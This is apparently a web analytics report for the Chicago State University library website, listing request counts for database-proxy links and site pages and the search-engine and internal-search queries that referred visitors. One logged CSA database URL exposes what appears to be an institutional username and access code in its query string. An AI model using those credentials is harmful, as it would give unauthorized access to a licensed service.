25  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=infotrac.galegroup.com/itweb/uiuc_csu?db=LitRC&dbname=Literature Resource Center
24  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=WilsonSelectPlus;FSIP&dbname=newfirstsearch.oclc.org/dbname=WilsonSelectPlus;FSIP
24  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=aph&dbname=search.epnet.com/login.asp?profile=web&defaultdb=aph
24  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.pubmedcentral.nih.gov/&dbname=PubMed Central
24  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.lib.niu.edu/ipo/&dbname=Illinois Periodicals Online
24  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=dah&dbname=Database of Abstracts of Reviews of Effectiveness
24  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ECO;FSIP&dbname=ECO: OCLC list of scholarly journals
23  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=web.lexis-nexis.com/universe&dbname=Lexis-Nexis Academic Universe - Business
22  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=MEDLINE;FSIP&dbname=Medline
22  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com&dbname=Chicago Sun Times
20  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.artstor.org&dbname=ARTstor
20  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/FSIP&dbname=Medline
20  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.xreferplus.com&dbname=Xreferplus
20  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/FSIP&dbname=WorldCat
20  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=mzh&dbname=MLA International Bibliography
19  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/psych&dbname=Annual Review of Psychology
18  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=eric&dbname=search.epnet.com/login.asp?profile=web&defaultdb=eric
18  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.els.net/&dbname=Encyclopedia of Life Sciences (ELS)
18  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.2facts.com/stories/mainmenu.asp&dbname=www.2facts.com/stories/mainmenu.asp
18  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/biophys&databasename=Annual Review of Biophysics&&dbname=arjournals.annualreviews.org/loi/biophys
18  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=sph&dbname=SPORTDiscus
18  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=PerAbs;FSIP&dbname=PerAbs - Periodical Abstracts
18  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/FSIP&dbname=ECO: OCLC list of scholarly journals
18  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPTExMjE@&clientId=45998&dbname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPTExMjE@&clientId=45998
16  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=gateway.ut.ovid.com/gw1/ovidweb.cgi?New+Database=Single|0&S=IDNJHKIDKGPBFN00&dbname=gateway.ut.ovid.com/gw1/ovidweb.cgi?New+Database=Single|0&S=IDNJHKIDKGPBFN00
16  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=prh&dbname=Primary Search
14  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=srck5&dbname=search.epnet.com/login.asp?profile=srck5
14  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.aspx?authtype=ip,uid&profile=bsi&dbname=Business Source Premiere Enhanced Searching Interface
14  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=pubs.acs.org/&dbname=American Chemical Society Publications
14  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.library.uiuc.edu/ibis/&dbname=Illinois Researcher Information Service
14  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.netlibrary.com/&dbname=NetLibrary
14  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/&databasename=EBSCO databases
14  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ERIC;FSIP&dbname=newfirstsearch.oclc.org/dbname=ERIC;FSIP
14  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=sb2.abc-clio.com:81/&dbname=Historical Abstracts
14  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=novelist&dbname=NoveList
14  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com/iw-search/we/Homepage?p_action=doc&p_theme=current&p_nbid=X6CQ5BGSMTEyNDk5NjgyMy40NDUzOTk6MToxMjo2Ni4xNTguMjguNDI&dbname=New York Times - Current
14  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=novelistk8&dbname=Novelist K-8
12  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=hxh&dbname=Health Source: Consumer Edition
12  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=ulh&dbname=MAS Ultra - School Edition
12  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=ilcso.illinois.edu/&dbname=ilcso.illinois.edu/
12  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/med&dbname=Annual Review of Medicine
12  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.csa2.com/htbin/dbrng.cgi?username=cstateu9&access=cstateu9009&cat=pei&adv=1&dbname=www.csa2.com/htbin/dbrng.cgi?username=cstateu9&access=cstateu9009&cat=pei&adv=1
12  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/soc?cookieSet=1&dbname=Annual Review of Sociology
11  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=BooksInPrint;FSIP&dbname=newfirstsearch.oclc.org/dbname=BooksInPrint;FSIP
11  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/toc/ecolsys/35/1&dbname=Annual Review of Ecology, Evolution, and Systematics
10  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=ani&dbname=EBSCO Animals
10  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPTM4M0U@&clientId=45998&dbname=Ethnic News Watch
10  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=web.lexis-nexis.com/universe/form/academic/reference.html&dbname=Lexis-Nexis Academic Universe - Reference
10  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com&dbname=New York Times - Current
10  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=eric&databasename=ERIC (EBSCO)
10  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=PapersFirst;FSIP&dbname=PapersFirst
10  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=hch&dbname=Health Source: Nursing/Academic Edition
10  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=mlc.naxosmusiclibrary.com&dbname=Naxos Music Library
10  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.grovemusic.com/&dbname=www.grovemusic.com/
10  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.marquiswhoswho.com&dbname=Who's Who? -- Marquis Who's Who on the Web
10  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=tax.cchgroup.com/ipnetwork&dbname=CCH - Tax On The Net
4509http://libnext.csu.edu/internet/index.html
4221http://libnext.csu.edu/cgi-bin/eresources/reference.py
3815http://libnext.csu.edu/lisas/positions/index.html
3463http://libnext.csu.edu/cgi-bin/a2z/index.py
176  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=A
173  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=C
162  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=ALL
162  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=M
153  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=E
112  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=P
90  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=B
79  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=L
70  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=S
67  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=D
62  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=F
56  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=G
54  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=W
52  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=N
50  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=T
45  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=H
45  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=I
38  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=R
34  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=J
22  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=O
12  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=K
10  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=U
10  http://libnext.csu.edu/cgi-bin/a2z/index.py?letter=Q
3381http://libnext.csu.edu/guides/userguides.html
3183http://libnext.csu.edu/cgi-bin/directory/index.py
292  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=ALL
211  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=M
172  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=H
96  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISPS
90  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=A
88  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISARS
86  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=S
78  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISPS&unit=CIRCULATION&useunit=Y
73  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=C
70  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=B
67  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=K
64  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=L
58  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=G
58  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=W
53  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISPS&unit=REFERENCE&useunit=Y
52  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=J
52  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISPS&unit=MATERIALS CENTER&useunit=Y
52  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISTS&letter=
51  http://libnext.csu.edu/cgi-bin/directory/index.py?department=ALL&letter=
50  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=D
50  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=R
48  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISAS&letter=
41  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=F
38  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=N
38  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISTS
35  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=T
35  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISAS
30  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=E
24  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISPS&unit=GOVERNMENT&useunit=Y
23  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=P
22  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISPS&letter=
20  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISARS&letter=
14  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISPS&unit=GOVERNMENT INFO&useunit=Y
10  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=Z
2922http://libnext.csu.edu/
2781http://libnext.csu.edu/eresources/remoteaccess.html
2708http://libnext.csu.edu/tlr/mediaservices/
2499http://libnext.csu.edu/catalogs/index.php
2198http://libnext.csu.edu/directory/index.html
1934http://libnext.csu.edu/guides/subjects/index.html
1909http://libnext.csu.edu/maps/sitemap.html
1856http://libnext.csu.edu/tlr/
1850http://libnext.csu.edu/units/
1645http://libnext.csu.edu/helpcenter/
1516http://libnext.csu.edu/guides/citationstyles.html
1397http://libnext.csu.edu/guides/courseguides.html
1333http://libnext.csu.edu/eresources/index.php
1237http://libnext.csu.edu/guides/researchingtopics.htm
1234http://libnext.csu.edu/elearning/
1204http://libnext.csu.edu/lisps/access/specialservices/reserves.html
1134http://libnext.csu.edu/lisps/access/specialservices/ill.html
1115http://libnext.csu.edu/vision/
1083http://libnext.csu.edu/departments/LISMS/mediaservices/
1030http://libnext.csu.edu/lisps/circulation/index.html
993http://libnext.csu.edu/eresources/databases/remoteaccess.html
951http://libnext.csu.edu/schedules/index.php
941http://libnext.csu.edu/directory/
878http://libnext.csu.edu/lisps/myaccount.html
872http://libnext.csu.edu/guides/
847http://libnext.csu.edu/lisps/ris/
815http://www.libraryjobpostings.org/indivlib.htm
807http://libnext.csu.edu/lisps/govinfo/
763http://www.csu.edu/locator/AtoZ.html
728http://libnext.csu.edu/schedules/
717http://libnext.csu.edu/helpcenter/desks/index.html
667http://libnext.csu.edu/units/orgchart.html
601http://libnext.csu.edu/acquisitions/development.html
582http://www.google.com/search
15  http://www.google.com/search?sitesearch=libnext.csu.edu&q=media+services
14  http://www.google.com/search?sitesearch=libnext.csu.edu&q=media+services&Submit=Search+this+Web+Site
576http://libnext.csu.edu/lisps/
559http://libnext.csu.edu/news/
543http://libnext.csu.edu/journals/inprint.html
526http://libnext.csu.edu/tutorials/glossary.html
524http://libnext.csu.edu/eresources/
454http://www.csu.edu/administrativeinformation/
445http://libnext.csu.edu/friends/
415http://libnext.csu.edu/guides/subjectguides.html
409http://libnext.csu.edu/helpcenter/desks/ill.shtml
406http://libnext.csu.edu/helpcenter/desks/reference.shtml
405http://libnext.csu.edu/lisas/
397http://libnext.csu.edu/lists/
337http://libnext.csu.edu/lisars/
303http://libnext.csu.edu/guides/deweynumber.html
297http://libnext.csu.edu/lisps/erc/index.html
294http://libnext.csu.edu/pap/
294http://www.csu.edu/facultyinformation/
286http://libnext.csu.edu/eresources/faqs.html
278http://libnext.csu.edu/helpcenter/desks/
268http://libnext.csu.edu/schedules/index.shtml
268http://libnext.csu.edu/eresources/databases/faqs.html
267http://libnext.csu.edu/tlr/mediaproductions/
254http://libnext.csu.edu/guides/callnumber.html
14417[not listed: 1,264 URLs]

Referrer Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the referrers (where people followed links from, or pages which included this site's images).

Listing referring URLs with at least 250 requests, sorted by the number of requests.

reqsURL
348165http://libnext.csu.edu/
15  http://libnext.csu.edu/?search2NAME=dissociative+disorders&search1ButtonNAME.x=15&search1ButtonNAME.y=12
14  http://libnext.csu.edu/?search2NAME=abortion
12  http://libnext.csu.edu/?search2NAME=the+promise+of+occupational+science:+a+developmental+assessment+of+an+emerging+academic+discipline&search1ButtonNAME.x=0&search1ButtonNAME.y=0
12  http://libnext.csu.edu/?search2NAME=immigration&search1ButtonNAME.x=25&search1ButtonNAME.y=6
11  http://libnext.csu.edu/?search2NAME=autism&search1ButtonNAME.x=0&search1ButtonNAME.y=0
11  http://libnext.csu.edu/?search2NAME=jstor
10  http://libnext.csu.edu/?search2NAME=ebsco&search1ButtonNAME.x=0&search1ButtonNAME.y=0
10  http://libnext.csu.edu/?search2NAME=accounting&search1ButtonNAME.x=16&search1ButtonNAME.y=10
210297http://www.csu.edu/
12  http://www.csu.edu/?BannerID=1833&AffiliateID=2
70798http://libnext.csu.edu/eresources/index.php
59974http://libnext.csu.edu/cgi-bin/eresources/eselect.py
52257  http://libnext.csu.edu/cgi-bin/eresources/eselect.py?title=All Databases
1410  http://libnext.csu.edu/cgi-bin/eresources/eselect.py?types=articles&title=Article Databases
242  http://libnext.csu.edu/cgi-bin/eresources/eselect.py?types=articles&title=Article%2520Databases
34  http://libnext.csu.edu/cgi-bin/eresources/eselect.py?title=All%2520Databases
32  http://libnext.csu.edu/cgi-bin/eresources/eselect.py?title=All%252520Databases
16  http://libnext.csu.edu/cgi-bin/eresources/eselect.py?title=All+Databases
29829http://libnext.csu.edu/finding/databases/subjects/
22222http://www.google.com/search
599  http://www.google.com/search?hl=en&q=chicago+state+university
378  http://www.google.com/search?hl=en&q=chicago+state+university&btnG=Google+Search
247  http://www.google.com/search?q=chicago+state+university+library&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
167  http://www.google.com/search?sitesearch=libnext.csu.edu&q=Search+web+site&Submit=>
156  http://www.google.com/search?hl=en&q=chicago+state+university+library&btnG=Google+Search
149  http://www.google.com/search?hl=en&q=Chicago+State+University&btnG=Google+Search
142  http://www.google.com/search?hl=en&q=chicago+state+university+library
126  http://www.google.com/search?hl=en&q=Chicago+State+University
102  http://www.google.com/search?sitesearch=libnext.csu.edu&q=Enter+search+here&Submit=>
86  http://www.google.com/search?q=chicago+state+library&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
85  http://www.google.com/search?q=chicago+state+university&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
73  http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=chicago+state+university&spell=1
69  http://www.google.com/search?hl=en&q=chicago+state
68  http://www.google.com/search?client=safari&rls=en&q=chicago+state+university&ie=UTF-8&oe=UTF-8
65  http://www.google.com/search?q=chicago+state+university
57  http://www.google.com/search?hl=en&lr=&q=chicago+state+university
55  http://www.google.com/search?sourceid=ie7&q=chicago+state+university+moodle&rls=com.microsoft:en-us:IE-SearchBox&ie=UTF-8&oe=UTF-8&rlz=1I7TSHB_enUS321
52  http://www.google.com/search?hl=en&q=chicago+state+university&btnG=Search
49  http://www.google.com/search?sitesearch=libnext.csu.edu&q=refworks&Submit=>
47  http://www.google.com/search?hl=en&q=chicago+state+library&btnG=Google+Search
45  http://www.google.com/search?hl=en&lr=&q=chicago+state+university&btnG=Search
43  http://www.google.com/search?sitesearch=libnext.csu.edu&q=refworks
43  http://www.google.com/search?sitesearch=libnext.csu.edu&q=blackboard
41  http://www.google.com/search?hl=en&q=chicago+state+library
41  http://www.google.com/search?client=safari&rls=en&q=chicago+state+university+library&ie=UTF-8&oe=UTF-8
40  http://www.google.com/search?sitesearch=libnext.csu.edu&q=rover&Submit=>
39  http://www.google.com/search?sitesearch=libnext.csu.edu&q=ebsco
36  http://www.google.com/search?client=firefox-a&rls=org.mozilla:en-US:official&channel=s&hl=en&q=chicago+state+university&btnG=Google+Search
35  http://www.google.com/search?sitesearch=libnext.csu.edu&q=media+services
34  http://www.google.com/search?q=csu+library&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
34  http://www.google.com/search?hl=en&q=chicago+state&btnG=Google+Search
34  http://www.google.com/search?client=firefox-a&rls=org.mozilla:en-US:official&channel=s&hl=en&q=chicago+state+university+library&btnG=Google+Search
31  http://www.google.com/search?q=chicago+state+university&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official
31  http://www.google.com/search?hl=en&sitesearch=libnext.csu.edu&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=Search+website&spell=1
28  http://www.google.com/search?sitesearch=libnext.csu.edu&q=ebsco&Submit=>
28  http://www.google.com/search?sitesearch=libnext.csu.edu&q=Search+here&Submit=>
26  http://www.google.com/search?sitesearch=libnext.csu.edu&q=media+services&Submit=Search+this+Web+Site
26  http://www.google.com/search?hl=en&lr=&q=Chicago+State+University
24  http://www.google.com/search?hl=en&ie=ISO-8859-1&q=chicago+state+university
24  http://www.google.com/search?client=firefox-a&rls=org.mozilla:en-US:official_s&hl=en&q=chicago+state+university&btnG=Google+Search
23  http://www.google.com/search?sitesearch=libnext.csu.edu&q=databases&Submit=Search+this+Web+Site
23  http://www.google.com/search?hl=en&lr=&q=chicago+state+university+library
22  http://www.google.com/search?hl=en&q=Chicago+State+University+Library&btnG=Google+Search
22  http://www.google.com/search?sitesearch=libnext.csu.edu&q=blackboard&Submit=>
21  http://www.google.com/search?client=firefox-a&rls=org.mozilla:en-US:official&channel=s&hl=en&q=chicago+state+library&btnG=Google+Search
21  http://www.google.com/search?hl=en&q=how+to+use+databases
20  http://www.google.com/search?hl=en&q=CHICAGO+STATE+UNIVERSITY
20  http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4SUNA_enUS255US256&q=chicago+state+university
20  http://www.google.com/search?q=chicago+state+university&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
19  http://www.google.com/search?hl=en&ie=ISO-8859-1&q=Chicago+State+University&btnG=Google+Search
19  http://www.google.com/search?q=Chicago+State+University&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
19  http://www.google.com/search?hl=en&q=chicago+state+university+library&btnG=Search
19  http://www.google.com/search?hl=en&q=Chicago+state+university
19  http://www.google.com/search?q=Chicago+State+University+Library&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
18  http://www.google.com/search?client=safari&rls=en&q=chicago+state+moodle&ie=UTF-8&oe=UTF-8
18  http://www.google.com/search?client=firefox-a&rls=org.mozilla:en-US:official&channel=s&hl=en&q=www.csu.edu&btnG=Google+Search
18  http://www.google.com/search?client=safari&rls=en&q=Chicago+State+University&ie=UTF-8&oe=UTF-8
18  http://www.google.com/search?sitesearch=libnext.csu.edu&q=ERIC&Submit=>
18  http://www.google.com/search?q=chicago+state+university+library&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official
17  http://www.google.com/search?q=chicago+state+university+library&ie=UTF-8&oe=UTF-8&hl=en&client=safari
17  http://www.google.com/search?sitesearch=libnext.csu.edu&q=novelist
17  http://www.google.com/search?q=Chicago+State+University
16  http://www.google.com/search?hl=en&q=Chicago+State
16  http://www.google.com/search?hl=en&lr=&q=chicago+state
16  http://www.google.com/search?hl=en&lr=&q=Chicago+State+University&btnG=Search
16  http://www.google.com/search?sitesearch=libnext.csu.edu&q=pharmacy
15  http://www.google.com/search?q=chicago+state+university&rls=com.microsoft:en-us&ie=UTF-8&oe=UTF-8&startIndex=&startPage=1
15  http://www.google.com/search?q=csu.edu
15  http://www.google.com/search?client=safari&rls=en&q=pharmacy+databases&ie=UTF-8&oe=UTF-8
15  http://www.google.com/search?hl=en&q=CHICAGO+STATE+UNIVERSITY&btnG=Google+Search
15  http://www.google.com/search?aq=f&sourceid=chrome&ie=UTF-8&q=chicago+state+university+library
15  http://www.google.com/search?sitesearch=libnext.csu.edu&q=cinahl
14  http://www.google.com/search?hl=en&q=chicago+state+university+
14  http://www.google.com/search?hl=en&q=chicago+state+university+&btnG=Google+Search
14  http://www.google.com/search?sitesearch=libnext.csu.edu&q=reference+tools
14  http://www.google.com/search?hl=en&lr=&q=chicago+state+university+library&btnG=Search
14  http://www.google.com/search?sitesearch=libnext.csu.edu&q=library&Submit=>
14  http://www.google.com/search?hl=en&q=Chicago+State+University&btnG=Search
14  http://www.google.com/search?client=safari&rls=en&q=chicago+state+university+moodle&ie=UTF-8&oe=UTF-8
14  http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=chicago+state+university+library
14  http://www.google.com/search?sitesearch=libnext.csu.edu&q=log+in
14  http://www.google.com/search?sitesearch=libnext.csu.edu&q=EBSCO&Submit=>
13  http://www.google.com/search?sitesearch=libnext.csu.edu&q=eric
13  http://www.google.com/search?sitesearch=libnext.csu.edu&q=blackboard&Submit=Search+this+Web+Site
13  http://www.google.com/search?q=chicago+state+university+library&rls=com.microsoft:en-us&ie=UTF-8&oe=UTF-8&startIndex=&startPage=1
13  http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=Chicago+State+University&spell=1
13  http://www.google.com/search?q=chicago+state+university+library&ie=utf-8&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a
13  http://www.google.com/search?q=chicago+state+university+library
13  http://www.google.com/search?q=how+to+use+databases&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
13  http://www.google.com/search?sitesearch=libnext.csu.edu&q=proquest
13  http://www.google.com/search?hl=en&q=Chicago+State+University+Library
13  http://www.google.com/search?hl=en&safe=active&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=chicago+state+university&spell=1
13  http://www.google.com/search?client=safari&rls=en&q=chicago+state+library&ie=UTF-8&oe=UTF-8
13  http://www.google.com/search?client=safari&rls=en&q=chicago+state&ie=UTF-8&oe=UTF-8
12  http://www.google.com/search?hl=en&q=Chicago+State+University+
12  http://www.google.com/search?sitesearch=libnext.csu.edu&q=databases
12  http://www.google.com/search?source=ig&hl=en&rlz=&q=chicago+state+university+library&btnG=Google+Search
12  http://www.google.com/search?q=chicago+state+library
12  http://www.google.com/search?client=firefox-a&rls=org.mozilla:en-US:official&channel=s&hl=en&q=csu.edu&btnG=Google+Search
12  http://www.google.com/search?q=csu+library&channel=linkdoctor
12  http://www.google.com/search?client=safari&rls=en&q=Chicago+State+University+Library&ie=UTF-8&oe=UTF-8
12  http://www.google.com/search?hl=en&q=chicago+state+university&spell=1
12  http://www.google.com/search?aq=f&sourceid=chrome&ie=UTF-8&q=csu+library
12  http://www.google.com/search?hl=en&q=chicago+state+library&btnG=Search
12  http://www.google.com/search?q=chicago+state+university&ie=UTF-8&oe=UTF-8&hl=en&client=safari
11  http://www.google.com/search?client=safari&rls=en&q=csu.edu+library&ie=UTF-8&oe=UTF-8
11  http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=csu+library
11  http://www.google.com/search?client=firefox-a&rls=org.mozilla:en-US:official&channel=s&hl=en&q=Chicago+State+University&btnG=Google+Search
11  http://www.google.com/search?sitesearch=libnext.csu.edu&q=facts.com
11  http://www.google.com/search?hl=en&q=www.csu.edu
11  http://www.google.com/search?q=library+copyright+statement&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
11  http://www.google.com/search?sitesearch=libnext.csu.edu&q=i+share
11  http://www.google.com/search?sitesearch=libnext.csu.edu&q=EBSCO
11  http://www.google.com/search?client=firefox-a&rls=org.mozilla:en-US:official&channel=s&hl=en&source=hp&q=csu.edu&btnG=Google+Search
11  http://www.google.com/search?hl=en&q=Chicago+state+university&btnG=Google+Search
11  http://www.google.com/search?sitesearch=libnext.csu.edu&q=ERIC
11  http://www.google.com/search?sitesearch=libnext.csu.edu&q=library+hours
11  http://www.google.com/search?hl=en&q=library+organizational+structure
11  http://www.google.com/search?q=csu.edu+library&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
10  http://www.google.com/search?hl=en&q=csu+megasearch
10  http://www.google.com/search?q=chicago+state+university&ie=utf-8&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a
10  http://www.google.com/search?hl=en&ie=ISO-8859-1&q=Chicago+State+University
10  http://www.google.com/search?hl=en&q=chicago+state+college
10  http://www.google.com/search?sitesearch=libnext.csu.edu&q=lexis+nexis
10  http://www.google.com/search?sitesearch=libnext.csu.edu&q=jstor
10  http://www.google.com/search?sourceid=navclient&aq=t&ie=UTF-8&rlz=1T4SUNA_enUS255US256&q=chicago+state+university
